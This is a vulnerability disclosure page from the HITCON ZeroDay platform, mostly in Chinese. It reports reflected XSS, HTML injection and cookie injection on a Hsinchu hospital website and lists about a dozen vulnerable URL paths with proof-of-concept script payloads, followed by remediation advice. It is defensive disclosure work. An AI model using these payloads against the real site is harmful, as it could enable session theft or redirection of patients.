新竹馬偕醫院網頁多重漏洞 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2018-01302
  •  發信 Vendor: 新竹馬偕醫院
  • Title: 新竹馬偕醫院網頁多重漏洞
  • Introduction: 可執行xss, and html injection

處理狀態

目前狀態

公開
Last Update : 2018/11/07
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2018/09/07 15:00:17 : 新提交 (由 MBA666 更新此狀態)
  • 2018/09/07 23:59:18 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/09/09 17:53:51 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/09/09 17:53:51 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/09/09 17:53:51 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/11/07 03:00:16 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2018-01302
  • 通報者:seanhung (MBA666)
  • 風險:中
  • 類型:反射型跨站腳本攻擊 (Reflected Cross-Site Scripting)

參考資料

攻擊者可經由該漏洞竊取使用者身份,或進行掛碼、轉址等攻擊行為。

漏洞說明: OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

防護原則: OWASP - XSS (Cross Site Scripting) Prevention Cheat Sheet
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

防禦繞過方式: OWASP - XSS Filter Evasion Cheat Sheet
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

xxs 網站 http://www.mmh.org.tw/
1. /ecard/write2.asp?id=<IMG%20SRC="javascript:alert(MBA666);">
2. /ecard/index.asp?typeid=<IMG%20SRC="javascript:alert(MBA666);">
3. /cal/pwd.asp?Pwd=<IMG%20SRC="javascript:alert(MBA666);">
4. /cal/pwd_admin.asp?Pwd=<IMG%20SRC="javascript:alert(MBA666);">
5. /cal/calendar_show1.asp?date=<IMG%20SRC="javascript:alert(MBA666);">
6. /taitam/onco_care/news/content.asp?MainT<IMG%20SRC="javascript:alert(MBA666);">
7./taitam/onco%5Fcare/events/content.asp?Title=<IMG%20SRC="javascript:alert(MBA666);">
8./taitam/onco%5Fcare/news/content.aspMainT<IMG%20SRC="javascript:alert(104);">
html injection
9. /taitam/medic/news/newslist.aspx?type=<"MBA666">
10. /taitam/onco%5Fcare/news/content.asp?MainT=<"MBA666>
11./taitam/onco%5Fcare/events/content.asp?Title=<"MBA666>
等等....。
cookie injection scripting
1. /ecard/write2.asp?id=<script>document.cookie="testvhyp=xxxxx;"</script>
2./cal/pwd.asp?Pwd=<script>document.cookie="testvhyp=xxxxxx;"</script>
等等

敘述

典型xxs html injection , cookie injection

(還沒實測)多網站還可能含有 clickjacking injection
The web server does not set an X-Frame-Options response header or a Content-Security-Policy 'frame-ancestors' response header in all content responses. This could potentially expose the site to a clickjacking

修補建議

1. 建議做完整的code review
2. 更新windows IIS7 6.0到高一點的版本6.0 以沒有再做修補的動作
因為醫院含有病人個人隱私建議趕快修補

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;